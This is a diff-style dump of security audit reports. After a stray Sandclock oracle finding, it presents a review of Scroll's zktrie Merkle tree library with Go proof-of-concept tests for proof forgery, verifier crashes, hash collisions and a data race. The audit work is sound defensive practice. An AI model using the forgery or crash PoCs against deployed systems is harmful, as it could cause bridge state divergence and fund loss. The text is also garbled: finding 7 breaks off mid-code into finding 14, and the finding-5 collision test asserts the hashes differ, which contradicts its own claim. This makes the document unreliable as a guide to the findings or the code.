TOB-SANDCLOCK-6: Chainlink oracles could return stale price data
Partially resolved. The third-party LSUDUsdToLUSDEth oracle has been deprecated in favor of the more reliable USD-to-ETH oracle maintained by Liquity. This solution has the side effect of assuming that the value of LUSD is exactly equal to that of USD. However, the amount of ETH held by the scLiquity vault at any given time is small relative to its exposure to the LUSD price, so the Lindy Labs team is willing to accept this trade-off. We recommend correcting an inline code comment that erroneously refers to the reported price as being in terms of LUSD rather than USD. For the benefit of future auditors and developers, we also recommend adding inline comments explaining the implications of and justifications for this trade-off. The usdcToEthPriceFeed and stEThToEthPriceFeed oracles have not been updated and are still at risk of using stale data without raising any warning.

diff --git a/findings_newupdate/tob/2023-07-scroll-zktrie-securityreview.txt b/findings_newupdate/tob/2023-07-scroll-zktrie-securityreview.txt new file mode 100644 index 0000000..a02f51b --- /dev/null +++ b/findings_newupdate/tob/2023-07-scroll-zktrie-securityreview.txt @@ -0,0 +1,35 @@
+1. Lack of domain separation allows proof forgery Severity: High Difficulty: Medium Type: Cryptography Finding ID: TOB-ZKTRIE-1 Target: trie/zk_trie_node.go Description Merkle trees are nested tree data structures in which the hash of each branch node depends upon the hashes of its children. The hash of each node is then assumed to uniquely represent the subtree of which that node is a root. However, that assumption may be false if a leaf node can have the same hash as a branch node. A general method for preventing leaf and branch nodes from colliding in this way is domain separation. That is, given a hash function H, define the hash of a leaf to be H(f(leaf_data)) and the hash of a branch to be H(g(branch_data)), where f and g are encoding functions that can never return the same result (perhaps because f's return values all start with the byte 0 and g's all start with the byte 1). Without domain separation, a malicious entity may be able to insert a leaf into the tree that can be later used as a branch in a Merkle path.
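By way of illustration, here is a minimal domain-separated hashing scheme in Solidity. This is a generic sketch using keccak256 (zktrie itself hashes field elements with a circuit-friendly hash), with the 0x00/0x01 prefixes playing the roles of the encoders f and g above.

// Generic sketch of domain separation for Merkle node hashing; not zktrie's
// actual scheme.
pragma solidity ^0.8.18;

library DomainSeparatedHash {
    // f(leaf_data): leaf encodings always begin with the byte 0x00.
    function leafHash(bytes32 key, bytes32 valueHash) internal pure returns (bytes32) {
        return keccak256(abi.encodePacked(bytes1(0x00), key, valueHash));
    }

    // g(branch_data): branch encodings always begin with the byte 0x01, so a
    // leaf hash can never equal a branch hash.
    function branchHash(bytes32 childL, bytes32 childR) internal pure returns (bytes32) {
        return keccak256(abi.encodePacked(bytes1(0x01), childL, childR));
    }
}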
In zktrie, the hash for a node is defined by the NodeHash method, shown in figure 1.1. As shown in the highlighted portions, the hash of a branch node is HashElems(n.ChildL, n.ChildR), while the hash of a leaf node is HashElems(1, n.NodeKey, n.valueHash).

// LeafHash computes the key of a leaf node given the hIndex and hValue of the
// entry of the leaf.
func LeafHash(k, v *zkt.Hash) (*zkt.Hash, error) {
    return zkt.HashElems(big.NewInt(1), k.BigInt(), v.BigInt())
}

// NodeHash computes the hash digest of the node by hashing the content in a
// specific way for each type of node. This key is used as the hash of the
// Merkle tree for each node.
func (n *Node) NodeHash() (*zkt.Hash, error) {
    if n.nodeHash == nil { // Cache the key to avoid repeated hash computations.
        // NOTE: We are not using the type to calculate the hash!
        switch n.Type {
        case NodeTypeParent: // H(ChildL || ChildR)
            var err error
            n.nodeHash, err = zkt.HashElems(n.ChildL.BigInt(), n.ChildR.BigInt())
            if err != nil {
                return nil, err
            }
        case NodeTypeLeaf:
            var err error
            n.valueHash, err = zkt.PreHandlingElems(n.CompressedFlags, n.ValuePreimage)
            if err != nil {
                return nil, err
            }
            n.nodeHash, err = LeafHash(n.NodeKey, n.valueHash)
            if err != nil {
                return nil, err
            }
        case NodeTypeEmpty: // Zero
            n.nodeHash = &zkt.HashZero
        default:
            n.nodeHash = &zkt.HashZero
        }
    }
    return n.nodeHash, nil
}

Figure 1.1: NodeHash and LeafHash (zktrie/trie/zk_trie_node.go#118–156)

The HashElems function used here performs recursive hashing in a binary-tree fashion. For the purpose of this finding, the key property is that HashElems(1,k,v) == H(H(1,k),v) and HashElems(n.ChildL,n.ChildR) == H(n.ChildL,n.ChildR), where H is the global two-input, one-output hash function. Therefore, a branch node b and a leaf node l where b.ChildL == H(1,l.NodeKey) and b.ChildR == l.valueHash will have equal hash values. This allows proof forgery; for example, a malicious entity can insert a key that can be proved to be both present and nonexistent in the tree, as illustrated by the proof-of-concept test in figure 1.2.
func TestMerkleTree_ForgeProof(t *testing.T) {
    zkTrie := newTestingMerkle(t, 10)
    t.Run("Testing for malicious proofs", func(t *testing.T) {
        // Find two distinct values k1,k2 such that the first step of
        // the path has the sibling on the LEFT (i.e., path[0] == false)
        k1, k2 := (func() (zkt.Byte32, zkt.Byte32) {
            k1 := zkt.Byte32{1}
            k2 := zkt.Byte32{2}
            k1_hash, _ := k1.Hash()
            k2_hash, _ := k2.Hash()
            for !getPath(1, zkt.NewHashFromBigInt(k1_hash)[:])[0] {
                for i := len(k1); i > 0; i -= 1 {
                    k1[i-1] += 1
                    if k1[i-1] != 0 {
                        break
                    }
                }
                k1_hash, _ = k1.Hash()
            }
            for k1 == k2 || !getPath(1, zkt.NewHashFromBigInt(k2_hash)[:])[0] {
                for i := len(k2); i > 0; i -= 1 {
                    k2[i-1] += 1
                    if k2[i-1] != 0 {
                        break
                    }
                }
                k2_hash, _ = k2.Hash()
            }
            return k1, k2
        })()

        k1_hash_int, _ := k1.Hash()
        k2_hash_int, _ := k2.Hash()
        k1_hash := zkt.NewHashFromBigInt(k1_hash_int)
        k2_hash := zkt.NewHashFromBigInt(k2_hash_int)

        // create a dummy value for k2, and use that to craft a
        // malicious value for k1
        k2_value := (&[2]zkt.Byte32{{2}})[:]
        k1_value, _ := NewLeafNode(k2_hash, 1, k2_value).NodeHash()
        k1_value_array := []zkt.Byte32{*zkt.NewByte32FromBytes(k1_value.Bytes())}

        // insert k1 into the trie with the malicious value
        assert.Nil(t, zkTrie.TryUpdate(zkt.NewHashFromBigInt(k1_hash_int), 0, k1_value_array))

        getNode := func(hash *zkt.Hash) (*Node, error) {
            return zkTrie.GetNode(hash)
        }

        // query an inclusion proof for k1
        k1Proof, _, err := BuildZkTrieProof(zkTrie.rootHash, k1_hash_int, 10, getNode)
        assert.Nil(t, err)
        assert.True(t, k1Proof.Existence)

        // check that inclusion proof against our root hash
        k1_val_hash, _ := NewLeafNode(k1_hash, 0, k1_value_array).NodeHash()
        k1Proof_root, _ := k1Proof.Verify(k1_val_hash, k1_hash)
        assert.Equal(t, k1Proof_root, zkTrie.rootHash)

        // forge a non-existence proof
        fakeNonExistProof := *k1Proof
        fakeNonExistProof.Existence = false

        // The new non-existence proof needs one extra level, where
        // the sibling hash is H(1,k1_hash)
        fakeNonExistProof.depth += 1
        zkt.SetBitBigEndian(fakeNonExistProof.notempties[:], fakeNonExistProof.depth-1)
        fakeSibHash, _ := zkt.HashElems(big.NewInt(1), k1_hash_int)
        fakeNonExistProof.Siblings = append(fakeNonExistProof.Siblings, fakeSibHash)

        // Construct the NodeAux details for the malicious leaf
        k2_value_hash, _ := zkt.PreHandlingElems(1, k2_value)
        k2_nodekey := zkt.NewHashFromBigInt(k2_hash_int)
        fakeNonExistProof.NodeAux = &NodeAux{Key: k2_nodekey, Value: k2_value_hash}

        // Check our non-existence proof against the root hash
        fakeNonExistProof_root, _ := fakeNonExistProof.Verify(k1_val_hash, k1_hash)
        assert.Equal(t, fakeNonExistProof_root, zkTrie.rootHash)

        // fakeNonExistProof and k1Proof prove opposite things. k1
        // is both in and not-in the tree!
        assert.NotEqual(t, fakeNonExistProof.Existence, k1Proof.Existence)
    })
}

Figure 1.2: A proof-of-concept test case for proof forgery

Exploit Scenario
Suppose Alice uses the zktrie to implement the Ethereum account table in a zkEVM-based bridge with trustless state updates. Bob submits a transaction that inserts specially crafted account data into some position in that tree. At a later time, Bob submits a transaction that depends on the result of an account table lookup. Bob generates two contradictory Merkle proofs and uses those proofs to create two zkEVM execution proofs that step to different final states. By submitting one proof each to the opposite sides of the bridge, Bob causes state divergence and a loss of funds.

Recommendations
Short term, modify NodeHash to domain-separate leaves and branches, such as by changing the branch hash to zkt.HashElems(big.NewInt(2), n.ChildL.BigInt(), n.ChildR.BigInt()).
Long term, fully document all data structure designs and requirements, and review all assumptions to ensure that they are well founded.
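To make the short-term recommendation concrete, the following is a minimal sketch in the style of figure 1.1. The helper name parentHash is ours, and the actual upstream fix (per appendix G) adopted a broader domain-separation scheme than shown here:

// parentHash is an illustrative, domain-separated branch hash. The domain
// tag 2 can never collide with the leaf domain tag 1 used by LeafHash, so a
// leaf hash H(H(1, key), valueHash) can no longer equal a branch hash.
func parentHash(childL, childR *zkt.Hash) (*zkt.Hash, error) {
    return zkt.HashElems(big.NewInt(2), childL.BigInt(), childR.BigInt())
}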
+2. Lack of proof validation causes denial of service on the verifier
Severity: Medium
Difficulty: Low
Type: Data Validation
Finding ID: TOB-ZKTRIE-2
Target: trie/zk_trie_impl.go

Description
The Merkle tree proof verifier assumes several well-formedness properties about the received proof and node arguments. If at least one of these properties is violated, the verifier will have a runtime error.

First, the node associated with the Merkle proof must be a leaf node (i.e., it must contain a non-nil NodeKey field). If this is not the case, computing rootFromProof for a nil NodeKey will cause a panic inside the getPath function. Second, the Proof fields must be consistent with one another; if the proof depth is incorrect, the verifier will make out-of-bounds accesses to both the NodeKey and the notempties fields. Finally, the length of the Siblings array should also be validated; for example, VerifyProofZkTrie will panic due to an out-of-bounds access if the proof.Siblings field is empty (see the sibling lookup in the rootFromProof function).

// VerifyProof verifies the Merkle Proof for the entry and root.
func VerifyProofZkTrie(rootHash *zkt.Hash, proof *Proof, node *Node) bool {
    nodeHash, err := node.NodeHash()
    if err != nil {
        return false
    }
    rootFromProof, err := proof.Verify(nodeHash, node.NodeKey)
    if err != nil {
        return false
    }
    return bytes.Equal(rootHash[:], rootFromProof[:])
}

// Verify the proof and calculate the root, nodeHash can be nil when try to verify
// a nonexistent proof
func (proof *Proof) Verify(nodeHash, nodeKey *zkt.Hash) (*zkt.Hash, error) {
    if proof.Existence {
        if nodeHash == nil {
            return nil, ErrKeyNotFound
        }
        return proof.rootFromProof(nodeHash, nodeKey)
    } else {
        if proof.NodeAux == nil {
            return proof.rootFromProof(&zkt.HashZero, nodeKey)
        } else {
            if bytes.Equal(nodeKey[:], proof.NodeAux.Key[:]) {
                return nil, fmt.Errorf("non-existence proof being checked against hIndex equal to nodeAux")
            }
            midHash, err := LeafHash(proof.NodeAux.Key, proof.NodeAux.Value)
            if err != nil {
                return nil, err
            }
            return proof.rootFromProof(midHash, nodeKey)
        }
    }
}

func (proof *Proof) rootFromProof(nodeHash, nodeKey *zkt.Hash) (*zkt.Hash, error) {
    var err error
    sibIdx := len(proof.Siblings) - 1
    path := getPath(int(proof.depth), nodeKey[:])
    var siblingHash *zkt.Hash
    for lvl := int(proof.depth) - 1; lvl >= 0; lvl-- {
        if zkt.TestBitBigEndian(proof.notempties[:], uint(lvl)) {
            siblingHash = proof.Siblings[sibIdx]
            sibIdx--
        } else {
            siblingHash = &zkt.HashZero
        }
        if path[lvl] {
            nodeHash, err = NewParentNode(siblingHash, nodeHash).NodeHash()
            if err != nil {
                return nil, err
            }
        } else {
            nodeHash, err = NewParentNode(nodeHash, siblingHash).NodeHash()
            if err != nil {
                return nil, err
            }
        }
    }
    return nodeHash, nil
}

Figure 2.1: zktrie/trie/zk_trie_impl.go#595–

Exploit Scenario
An attacker crafts an invalid proof that causes the proof verifier to crash, causing a denial of service in the system.

Recommendations
Short term, validate the proof structure before attempting to use its values. Add fuzz testing to the VerifyProofZkTrie function.
Long term, add extensive tests and fuzz testing to functions interfacing with attacker-controlled values.
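A sketch of the kind of up-front validation the short-term recommendation calls for is shown below. The helper validateProofShape is hypothetical (it is not part of the zktrie API), it assumes the standard errors package, and the bounds would need to match the tree's configured maximum depth:

// validateProofShape rejects malformed proofs before any hashing is
// attempted. It is a sketch only: it checks the properties whose violation
// is described in this finding.
func validateProofShape(proof *Proof, node *Node, maxLevels int) error {
    if node == nil || node.NodeKey == nil {
        return errors.New("proof node must be a leaf with a non-nil NodeKey")
    }
    if int(proof.depth) > maxLevels || int(proof.depth) > len(proof.notempties)*8 {
        return errors.New("proof depth exceeds the supported tree height")
    }
    // Every bit set in notempties below depth must be backed by a sibling.
    expected := 0
    for lvl := 0; lvl < int(proof.depth); lvl++ {
        if zkt.TestBitBigEndian(proof.notempties[:], uint(lvl)) {
            expected++
        }
    }
    if expected != len(proof.Siblings) {
        return errors.New("Siblings length is inconsistent with the notempties bitmap")
    }
    return nil
}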
+3. Two incompatible ways to generate proofs
Severity: Informational
Difficulty: Low
Type: Data Validation
Finding ID: TOB-ZKTRIE-3
Target: trie/{zk_trie.go, zk_trie_impl.go}

Description
There are two incompatible ways to generate proofs. The first implementation (figure 3.1) writes to a given callback, effectively returning []bytes. It does not have a companion verification function; it has only positive tests (zktrie/trie/zk_trie_test.go#L93-L125); and it is accessible from the C function TrieProve and the Rust function prove. The second implementation (figure 3.2) returns a pointer to a Proof struct. It has a companion verification function (zktrie/trie/zk_trie_impl.go#L595-L632); it has positive and negative tests (zktrie/trie/zk_trie_impl_test.go#L484-L537); and it is not accessible from C or Rust.

// Prove is a simlified calling of ProveWithDeletion
func (t *ZkTrie) Prove(key []byte, fromLevel uint, writeNode func(*Node) error) error {
    return t.ProveWithDeletion(key, fromLevel, writeNode, nil)
}

// ProveWithDeletion constructs a merkle proof for key. The result contains all encoded nodes
// on the path to the value at key. The value itself is also included in the last
// node and can be retrieved by verifying the proof.
//
// If the trie does not contain a value for key, the returned proof contains all
// nodes of the longest existing prefix of the key (at least the root node), ending
// with the node that proves the absence of the key.
//
// If the trie contain value for key, the onHit is called BEFORE writeNode being called,
// both the hitted leaf node and its sibling node is provided as arguments so caller
// would receive enough information for launch a deletion and calculate the new root
// base on the proof data
// Also notice the sibling can be nil if the trie has only one leaf
func (t *ZkTrie) ProveWithDeletion(key []byte, fromLevel uint, writeNode func(*Node) error, onHit func(*Node, *Node)) error {
    [...]
}

Figure 3.1: The first way to generate proofs (zktrie/trie/zk_trie.go#143–164)

// Proof defines the required elements for a MT proof of existence or
// non-existence.
type Proof struct {
    // existence indicates wether this is a proof of existence or
    // non-existence.
    Existence bool
    // depth indicates how deep in the tree the proof goes.
    depth uint
    // notempties is a bitmap of non-empty Siblings found in Siblings.
    notempties [zkt.HashByteLen - proofFlagsLen]byte
    // Siblings is a list of non-empty sibling node hashes.
    Siblings []*zkt.Hash
    // NodeAux contains the auxiliary information of the lowest common ancestor
    // node in a non-existence proof.
    NodeAux *NodeAux
}

// BuildZkTrieProof prove uniformed way to turn some data collections into Proof struct
func BuildZkTrieProof(rootHash *zkt.Hash, k *big.Int, lvl int, getNode func(key *zkt.Hash) (*Node, error)) (*Proof, *Node, error) {
    [...]
}

Figure 3.2: The second way to generate proofs (zktrie/trie/zk_trie_impl.go#531–551)

Recommendations
Short term, decide on one implementation and remove the other implementation.
Long term, ensure full test coverage in the chosen implementation; ensure the implementation has both positive and negative testing; and add fuzz testing to the proof verification routine.
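As an illustration of the negative testing recommended above for the retained implementation, a test along the following lines could be added. The test name is ours, and it reuses the newTestingMerkle, BuildZkTrieProof, and VerifyProofZkTrie helpers shown elsewhere in this report:

// A tampered proof must not verify. This sketch flips one byte of a sibling
// in a freshly built inclusion proof and expects verification to fail.
// (With a single leaf, the sibling list may be empty, in which case there
// is nothing to corrupt.)
func TestTamperedProofFailsToVerify(t *testing.T) {
    zkTrie := newTestingMerkle(t, 10)
    k := zkt.Byte32{1}
    kHashInt, _ := k.Hash()
    kHash := zkt.NewHashFromBigInt(kHashInt)
    assert.Nil(t, zkTrie.TryUpdate(kHash, 0, []zkt.Byte32{{1}}))

    getNode := func(h *zkt.Hash) (*Node, error) { return zkTrie.GetNode(h) }
    proof, node, err := BuildZkTrieProof(zkTrie.rootHash, kHashInt, 10, getNode)
    assert.Nil(t, err)
    assert.True(t, VerifyProofZkTrie(zkTrie.rootHash, proof, node))

    if len(proof.Siblings) > 0 {
        proof.Siblings[0][0] ^= 0xff // corrupt one byte of the first sibling
        assert.False(t, VerifyProofZkTrie(zkTrie.rootHash, proof, node))
    }
}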
+4. BuildZkTrieProof does not populate NodeAux.Value
Severity: Low
Difficulty: Low
Type: Testing
Finding ID: TOB-ZKTRIE-4
Target: trie/zk_trie_impl.go

Description
A nonexistence proof for some key k in a Merkle tree is a Merkle path from the root of the tree to a subtree, which would contain k if it were present but which instead is either an empty subtree or a subtree with a single leaf k2, where k != k2. In the zktrie codebase, that second case is handled by the NodeAux field in the Proof struct, as illustrated in figure 4.1.

// Verify the proof and calculate the root, nodeHash can be nil when try to verify
// a nonexistent proof
func (proof *Proof) Verify(nodeHash, nodeKey *zkt.Hash) (*zkt.Hash, error) {
    if proof.Existence {
        if nodeHash == nil {
            return nil, ErrKeyNotFound
        }
        return proof.rootFromProof(nodeHash, nodeKey)
    } else {
        if proof.NodeAux == nil {
            return proof.rootFromProof(&zkt.HashZero, nodeKey)
        } else {
            if bytes.Equal(nodeKey[:], proof.NodeAux.Key[:]) {
                return nil, fmt.Errorf("non-existence proof being checked against hIndex equal to nodeAux")
            }
            midHash, err := LeafHash(proof.NodeAux.Key, proof.NodeAux.Value)
            if err != nil {
                return nil, err
            }
            return proof.rootFromProof(midHash, nodeKey)
        }
    }
}

Figure 4.1: The Proof.Verify method (zktrie/trie/zk_trie_impl.go#609–632)

When a non-inclusion proof is generated, the BuildZkTrieProof function looks up the other leaf node and uses its NodeKey and valueHash fields to populate the Key and Value fields of NodeAux, as shown in figure 4.2. However, the valueHash field of this node may be nil, causing NodeAux.Value to be nil and causing proof verification to crash with a nil pointer dereference error, which can be triggered by the test case shown in figure 4.3.

n, err := getNode(nextHash)
if err != nil {
    return nil, nil, err
}
switch n.Type {
case NodeTypeEmpty:
    return p, n, nil
case NodeTypeLeaf:
    if bytes.Equal(kHash[:], n.NodeKey[:]) {
        p.Existence = true
        return p, n, nil
    }
    // We found a leaf whose entry didn't match hIndex
    p.NodeAux = &NodeAux{Key: n.NodeKey, Value: n.valueHash}
    return p, n, nil

Figure 4.2: Populating NodeAux (zktrie/trie/zk_trie_impl.go#560–574)

func TestMerkleTree_GetNonIncProof(t *testing.T) {
    zkTrie := newTestingMerkle(t, 10)
    t.Run("Testing for non-inclusion proofs", func(t *testing.T) {
        k := zkt.Byte32{1}
        k_value := (&[1]zkt.Byte32{{1}})[:]
        k_other := zkt.Byte32{2}
        k_hash_int, _ := k.Hash()
        k_other_hash_int, _ := k_other.Hash()
        k_hash := zkt.NewHashFromBigInt(k_hash_int)
        k_other_hash := zkt.NewHashFromBigInt(k_other_hash_int)
        assert.Nil(t, zkTrie.TryUpdate(k_hash, 0, k_value))
        getNode := func(hash *zkt.Hash) (*Node, error) {
            return zkTrie.GetNode(hash)
        }
        proof, _, err := BuildZkTrieProof(zkTrie.rootHash, k_other_hash_int, 10, getNode)
        assert.Nil(t, err)
        assert.False(t, proof.Existence)
        proof_root, _ := proof.Verify(nil, k_other_hash)
        assert.Equal(t, proof_root, zkTrie.rootHash)
    })
}

Figure 4.3: A test case that will crash with a nil dereference of NodeAux.Value

Adding a call to n.NodeHash() inside BuildZkTrieProof, as shown in figure 4.4, fixes this problem.

n, err := getNode(nextHash)
if err != nil {
    return nil, nil, err
}
switch n.Type {
case NodeTypeEmpty:
    return p, n, nil
case NodeTypeLeaf:
    if bytes.Equal(kHash[:], n.NodeKey[:]) {
        p.Existence = true
        return p, n, nil
    }
    n.NodeHash() // added call: populates n.valueHash before it is used below
    // We found a leaf whose entry didn't match hIndex
    p.NodeAux = &NodeAux{Key: n.NodeKey, Value: n.valueHash}
    return p, n, nil

Figure 4.4: Adding the highlighted n.NodeHash() call fixes this problem. (zktrie/trie/zk_trie_impl.go#560–574)
Exploit Scenario
An adversary or ordinary user requests that the software generate and verify a non-inclusion proof, and the software crashes, leading to the loss of service.

Recommendations
Short term, fix BuildZkTrieProof by adding a call to n.NodeHash(), as described above.
Long term, ensure that all major code paths in important functions, such as proof generation and verification, are tested. The Go coverage analysis report generated by the command go test -cover -coverprofile c.out && go tool cover -html=c.out shows that this branch in Proof.Verify is not currently tested:

Figure 4.5: The Go coverage analysis report

5. Leaf nodes with different values may have the same hash
Severity: High
Difficulty: Medium
Type: Cryptography
Finding ID: TOB-ZKTRIE-5
Target: trie/zk_trie_node.go, types/util.go

Description
The hash value of a leaf node is derived from the hash of its key and its value. A leaf node’s value comprises up to 256 32-byte fields, and that value’s hash is computed by passing those fields to the HashElems function. HashElems hashes these fields in a Merkle tree–style binary tree pattern, as shown in figure 5.1.

func HashElems(fst, snd *big.Int, elems ...*big.Int) (*Hash, error) {
    l := len(elems)
    baseH, err := hashScheme([]*big.Int{fst, snd})
    if err != nil {
        return nil, err
    }
    if l == 0 {
        return NewHashFromBigInt(baseH), nil
    } else if l == 1 {
        return HashElems(baseH, elems[0])
    }
    tmp := make([]*big.Int, (l+1)/2)
    for i := range tmp {
        if (i+1)*2 > l {
            tmp[i] = elems[i*2]
        } else {
            h, err := hashScheme(elems[i*2 : (i+1)*2])
            if err != nil {
                return nil, err
            }
            tmp[i] = h
        }
    }
    return HashElems(baseH, tmp[0], tmp[1:]...)
}

Figure 5.1: Binary-tree hashing in HashElems (zktrie/types/util.go#9–36)

However, HashElems does not include the number of elements being hashed, so leaf nodes with different values may have the same hash, as illustrated by the proof-of-concept test case shown in figure 5.2.

func TestMerkleTree_MultiValue(t *testing.T) {
    t.Run("Testing for value collisions", func(t *testing.T) {
        k := zkt.Byte32{1}
        k_hash_int, _ := k.Hash()
        k_hash := zkt.NewHashFromBigInt(k_hash_int)

        value1 := (&[3]zkt.Byte32{{1}, {2}, {3}})[:]
        value1_hash, _ := NewLeafNode(k_hash, 0, value1).NodeHash()

        first2_hash, _ := zkt.PreHandlingElems(0, value1[:2])
        value2 := (&[2]zkt.Byte32{*zkt.NewByte32FromBytes(first2_hash.Bytes()), {3}})[:]
        value2_hash, _ := NewLeafNode(k_hash, 0, value2).NodeHash()

        assert.NotEqual(t, value1, value2)
        assert.NotEqual(t, value1_hash, value2_hash)
    })
}

Figure 5.2: A proof-of-concept test case for value collisions

Exploit Scenario
An adversary inserts a maliciously crafted value into the tree and then creates a proof for a different, colliding value. This violates the security requirements of a Merkle tree and may lead to incorrect behavior such as state divergence.

Recommendations
Short term, modify PreHandlingElems to prefix the ValuePreimage array with its length before it is passed to HashElems.
Long term, document and review all uses of hash functions to ensure that they commit to their inputs.
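To illustrate the short-term recommendation, here is a minimal sketch that commits to the element count before hashing. The helper name is ours, and per appendix G the actual fix instead added sequence-length domain separation inside HashElems itself:

// hashFieldsWithLength is an illustrative helper: it prefixes the field
// array with its length so that values of different lengths can no longer
// collapse to the same digest.
func hashFieldsWithLength(fields []*big.Int) (*Hash, error) {
    if len(fields) == 0 {
        return nil, errors.New("empty field array")
    }
    length := big.NewInt(int64(len(fields))) // commits to the element count
    return HashElems(length, fields[0], fields[1:]...)
}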
6. Empty UpdatePreimage function body
Severity: Informational
Difficulty: N/A
Type: Auditing and Logging
Finding ID: TOB-ZKTRIE-6
Target: trie/zk_trie_database.go

Description
The UpdatePreimage function implementation for the Database receiver type is empty. Instead of an empty function body, the function should either panic with an unimplemented message or log one. This would prevent the function from being used without any warning.

func (db *Database) UpdatePreimage([]byte, *big.Int) {}

Figure 6.1: zktrie/trie/zk_trie_database.go#19

Recommendations
Short term, add an unimplemented message to the function body, through either a panic or message logging.
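A minimal sketch of the short-term recommendation (the message text is ours):

// Fail loudly instead of silently doing nothing, so any accidental use of
// the unimplemented method is immediately visible.
func (db *Database) UpdatePreimage([]byte, *big.Int) {
    panic("zktrie: Database.UpdatePreimage is not implemented")
}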
7. CanonicalValue is not canonical
Severity: Informational
Difficulty: N/A
Type: Cryptography
Finding ID: TOB-ZKTRIE-7
Target: trie/zk_trie_node.go

Description
The CanonicalValue function does not uniquely generate a representation of Node structures: different Nodes can share the same CanonicalValue, and two nodes with the same NodeHash can have different CanonicalValues.

ValuePreimages in a Node can be either uncompressed or compressed (by hashing); the CompressedFlags value indicates which data is compressed. Only the first 24 fields can be compressed, so CanonicalValue truncates CompressedFlags to the first 24 bits. But NewLeafNode accepts any uint32 for the CompressedFlags field of a Node. Figure 7.3 shows how this can be used to construct two different Node structs that have the same CanonicalValue.

// CanonicalValue returns the byte form of a node required to be persisted, and strip unnecessary fields
// from the encoding (current only KeyPreimage for Leaf node) to keep a minimum size for content being
// stored in backend storage
func (n *Node) CanonicalValue() []byte {
    switch n.Type {
    case NodeTypeParent: // {Type || ChildL || ChildR}
        bytes := []byte{byte(n.Type)}
        bytes = append(bytes, n.ChildL.Bytes()...)
        bytes = append(bytes, n.ChildR.Bytes()...)
        return bytes
    case NodeTypeLeaf: // {Type || Data...}
        bytes := []byte{byte(n.Type)}
        bytes = append(bytes, n.NodeKey.Bytes()...)
        tmp := make([]byte, 4)
        compressedFlag := (n.CompressedFlags << 8) + uint32(len(n.ValuePreimage))
        binary.LittleEndian.PutUint32(tmp, compressedFlag)
        bytes = append(bytes, tmp...)
        for _, elm := range n.ValuePreimage {
            bytes = append(bytes, elm[:]...)
        }
        bytes = append(bytes, 0)
        return bytes
    case NodeTypeEmpty: // { Type }
        return []byte{byte(n.Type)}
    default:
        return []byte{}
    }
}

Figure 7.1: This figure shows the CanonicalValue computation. The highlighted code assumes that CompressedFlags is 24 bits. (zktrie/trie/zk_trie_node.go#187–214)

// NewLeafNode creates a new leaf node.
func NewLeafNode(k *zkt.Hash, valueFlags uint32, valuePreimage []zkt.Byte32) *Node {
    return &Node{Type: NodeTypeLeaf, NodeKey: k, CompressedFlags: valueFlags, ValuePreimage: valuePreimage}
}

Figure 7.2: Node construction in NewLeafNode (zktrie/trie/zk_trie_node.go#55–58)

// CanonicalValue implicitly truncates CompressedFlags to 24 bits. This test should ideally fail.
func TestZkTrie_CanonicalValue1(t *testing.T) {
    key, err := hex.DecodeString("0000000000000000000000000000000000000000000000000000000000000000")
    assert.NoError(t, err)
    vPreimage := []zkt.Byte32{{0}}
    k := zkt.NewHashFromBytes(key)
    vFlag0 := uint32(0x00ffffff)
    vFlag1 := uint32(0xffffffff)
    lf0 := NewLeafNode(k, vFlag0, vPreimage)
    lf1 := NewLeafNode(k, vFlag1, vPreimage)
    // These two assertions should never simultaneously pass.
    assert.True(t, lf0.CompressedFlags != lf1.CompressedFlags)
    assert.True(t, reflect.DeepEqual(lf0.CanonicalValue(), lf1.CanonicalValue()))
}

Figure 7.3: A test showing that one can construct different nodes with the same CanonicalValue

// PreHandlingElems turn persisted byte32 elements into field arrays for our hashElem
// it also has the compressed byte32
func PreHandlingElems(flagArray uint32, elems []Byte32) (*Hash, error) {
    ret := make([]*big.Int, len(elems))
    var err error
    for i, elem := range elems {
        if flagArray&(1<<…

14. NewNodeFromBytes does not fully validate its input
Finding ID: TOB-ZKTRIE-14
Target: trie/zk_trie_node.go

…
    n.ValuePreimage = make([]zkt.Byte32, preimageLen)
    curPos := zkt.HashByteLen + 4
    if len(b) < curPos+preimageLen*32+1 {
        return nil, ErrNodeBytesBadSize
    }
    …
    if preImageSize != 0 {
        if len(b) < curPos+preImageSize {
            return nil, ErrNodeBytesBadSize
        }
        n.KeyPreimage = new(zkt.Byte32)
        copy(n.KeyPreimage[:], b[curPos:curPos+preImageSize])
    }
case NodeTypeEmpty:
    break

Figure 14.1: preimageLen and len(b) are not fully checked. (trie/zk_trie_node.go#78–111)

Recommendations
Short term, add checks of the total byte array length and the preimageLen field to NewNodeFromBytes.
Long term, explicitly document the serialization format for nodes, and add tests for incorrect serialized nodes.
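A sketch of the short-term checks, using the names that appear in figure 14.1. The helper validateLeafBytes is hypothetical, and the 256-field bound follows from the leaf value layout described in finding TOB-ZKTRIE-5:

// validateLeafBytes bounds preimageLen before any allocation and verifies
// the declared sizes against the actual buffer length.
func validateLeafBytes(b []byte, preimageLen, preImageSize int) error {
    const maxValuePreimage = 256 // a leaf value holds at most 256 Byte32 fields
    if preimageLen < 0 || preimageLen > maxValuePreimage {
        return ErrNodeBytesBadSize
    }
    bodyEnd := zkt.HashByteLen + 4 + preimageLen*32 + 1
    if len(b) < bodyEnd {
        return ErrNodeBytesBadSize
    }
    if preImageSize != 0 && len(b) < bodyEnd+preImageSize {
        return ErrNodeBytesBadSize
    }
    return nil
}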
15. init_hash_scheme is not thread-safe
Severity: Informational
Difficulty: N/A
Type: Undefined Behavior
Finding ID: TOB-ZKTRIE-15
Target: src/lib.rs, lib.go, c.go, types/hash.go

Description
zktrie provides a safe-Rust interface around its Go implementation. Safe Rust statically prevents various memory safety errors, including null pointer dereferences and data races. However, when unsafe Rust is wrapped in a safe interface, the unsafe code must provide any guarantees that safe Rust expects. For more information about writing unsafe Rust, consult The Rustonomicon.

The init_hash_scheme function, shown in figure 15.1, calls InitHashScheme, which is a cgo wrapper for the Go function shown in figure 15.2.

pub fn init_hash_scheme(f: HashScheme) {
    unsafe { InitHashScheme(f) }
}

Figure 15.1: src/lib.rs#67–69

// notice the function must use C calling convention
//export InitHashScheme
func InitHashScheme(f unsafe.Pointer) {
    hash_f := C.hashF(f)
    C.init_hash_scheme(hash_f)
    zkt.InitHashScheme(hash_external)
}

Figure 15.2: lib.go#65–71

InitHashScheme calls two other functions: first, a C function called init_hash_scheme and, second, another Go function (this time, in the hash module) called InitHashScheme. This second Go function is synchronized with a sync.Once object, as shown in figure 15.3.

func InitHashScheme(f func([]*big.Int) (*big.Int, error)) {
    setHashScheme.Do(func() {
        hashScheme = f
    })
}

Figure 15.3: types/hash.go#29–

However, the C function init_hash_scheme, shown in figure 15.4, performs a completely unsynchronized write to the global variable hash_scheme, which can lead to a data race.

void init_hash_scheme(hashF f){
    hash_scheme = f;
}

Figure 15.4: c.go#13–15

